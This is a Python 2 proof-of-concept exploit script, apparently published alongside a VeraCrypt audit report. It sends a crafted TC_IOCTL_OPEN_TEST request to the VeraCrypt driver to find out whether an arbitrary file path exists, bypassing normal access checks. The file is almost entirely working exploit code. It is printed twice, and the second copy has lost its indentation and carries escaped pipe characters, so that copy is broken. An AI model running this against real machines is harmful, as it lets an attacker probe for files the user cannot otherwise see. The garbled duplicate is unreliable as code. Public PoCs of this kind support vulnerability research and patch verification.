xpn/tc_ioctl_open_test_poc.py

## tc_ioctl_open_test_poc.py
#!/usr/bin/env python

import sys
from ctypes import *

FILE_DEVICE_UNKNOWN = 0x00000022
METHOD_BUFFERED = 0
FILE_ANY_ACCESS = 0

TC_MAX_PATH = 260
VOLUME_MAX_SIZE = 32

OPEN_EXISTING = 0x3
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2

DRIVER_NAME = "\\\\.\\VeraCrypt"
TC_IOCTL_OPEN_TEST = 13

def CTL_CODE(DeviceType, Function, Method, Access): return (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
def TC_IOCTL(Code): return CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800 + (Code), METHOD_BUFFERED, FILE_ANY_ACCESS)

class OPEN_TEST_STRUCT(Structure):
    _pack_ = 1
    _fields_ = [("DeviceName", c_wchar * TC_MAX_PATH),
                ("bDetectTCBootLoader", c_int),
                ("TCBootLoaderDetected", c_int),
                ("DetectFilesystem", c_int),
                ("FilesystemDetected", c_int),
                ("bMatchVolumeID", c_int),
                ("volumeID", c_char * VOLUME_MAX_SIZE),
                ("VolumeIDMatched", c_int)]

if __name__ == "__main__":

    print "\nPOC for VeraCrypt TC_IOCTL_OPEN_TEST vulnerability"
    print "  Created by @_xpn_"
    print "    Report from Quarkslab can be found at:\n    https://ostif.org/the-veracrypt-audit-results/\n"

    if len(sys.argv) != 2:
        print "Usage: %s FULL_PATH" % (sys.argv[0])
        quit(1)

    h_driver = windll.kernel32.CreateFileA(DRIVER_NAME, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None)

    if h_driver == -1:
        print "[X] Error Opening Driver: %s" % (DRIVER_NAME)
        print "[X] Make sure that VeraCrypt has been installed"
        quit(1)
    else:
        print "[-] Opened Driver (%s) Successfully" % (DRIVER_NAME)

    ioctl_data = OPEN_TEST_STRUCT()
    ioctl_data.DeviceName = u"\\dosdevices\\" + sys.argv[1]
    dwReturn = c_ulong()

    ioctl_result = windll.kernel32.DeviceIoControl(h_driver, TC_IOCTL(TC_IOCTL_OPEN_TEST), ioctl_data, sizeof(ioctl_data), ioctl_data, sizeof(ioctl_data), byref(dwReturn), None)
    nt_error = windll.kernel32.GetLastError()

    if ioctl_result > 0 and nt_error == 0:
        print "[-] File exists"
    elif ioctl_result == 0 and nt_error == 2:
        print "[-] File does not exist"
    elif ioctl_result == 0 and nt_error == 123:
        print "[X] Error: Invalid path provided"
    else:
        print "[X] Unknown error:\n\tDeviceIOControl result: %d\n\tGetLastError result: %d\n" % (ioctl_result, nt_error)
	#!/usr/bin/env python

	import sys
	from ctypes import *

	FILE_DEVICE_UNKNOWN = 0x00000022
	METHOD_BUFFERED = 0
	FILE_ANY_ACCESS = 0

	TC_MAX_PATH = 260
	VOLUME_MAX_SIZE = 32

	OPEN_EXISTING = 0x3
	FILE_SHARE_READ = 1
	FILE_SHARE_WRITE = 2

	DRIVER_NAME = "\\\\.\\VeraCrypt"
	TC_IOCTL_OPEN_TEST = 13

	def CTL_CODE(DeviceType, Function, Method, Access): return (DeviceType << 16) \| (Access << 14) \| (Function << 2) \| Method
	def TC_IOCTL(Code): return CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800 + (Code), METHOD_BUFFERED, FILE_ANY_ACCESS)

	class OPEN_TEST_STRUCT(Structure):
	_pack_ = 1
	_fields_ = [("DeviceName", c_wchar * TC_MAX_PATH),
	("bDetectTCBootLoader", c_int),
	("TCBootLoaderDetected", c_int),
	("DetectFilesystem", c_int),
	("FilesystemDetected", c_int),
	("bMatchVolumeID", c_int),
	("volumeID", c_char * VOLUME_MAX_SIZE),
	("VolumeIDMatched", c_int)]

	if __name__ == "__main__":

	print "\nPOC for VeraCrypt TC_IOCTL_OPEN_TEST vulnerability"
	print " Created by @_xpn_"
	print " Report from Quarkslab can be found at:\n https://ostif.org/the-veracrypt-audit-results/\n"

	if len(sys.argv) != 2:
	print "Usage: %s FULL_PATH" % (sys.argv[0])
	quit(1)

	h_driver = windll.kernel32.CreateFileA(DRIVER_NAME, 0, FILE_SHARE_READ \| FILE_SHARE_WRITE, None, OPEN_EXISTING, 0, None)

	if h_driver == -1:
	print "[X] Error Opening Driver: %s" % (DRIVER_NAME)
	print "[X] Make sure that VeraCrypt has been installed"
	quit(1)
	else:
	print "[-] Opened Driver (%s) Successfully" % (DRIVER_NAME)

	ioctl_data = OPEN_TEST_STRUCT()
	ioctl_data.DeviceName = u"\\dosdevices\\" + sys.argv[1]
	dwReturn = c_ulong()

	ioctl_result = windll.kernel32.DeviceIoControl(h_driver, TC_IOCTL(TC_IOCTL_OPEN_TEST), ioctl_data, sizeof(ioctl_data), ioctl_data, sizeof(ioctl_data), byref(dwReturn), None)
	nt_error = windll.kernel32.GetLastError()

	if ioctl_result > 0 and nt_error == 0:
	print "[-] File exists"
	elif ioctl_result == 0 and nt_error == 2:
	print "[-] File does not exist"
	elif ioctl_result == 0 and nt_error == 123:
	print "[X] Error: Invalid path provided"
	else:
	print "[X] Unknown error:\n\tDeviceIOControl result: %d\n\tGetLastError result: %d\n" % (ioctl_result, nt_error)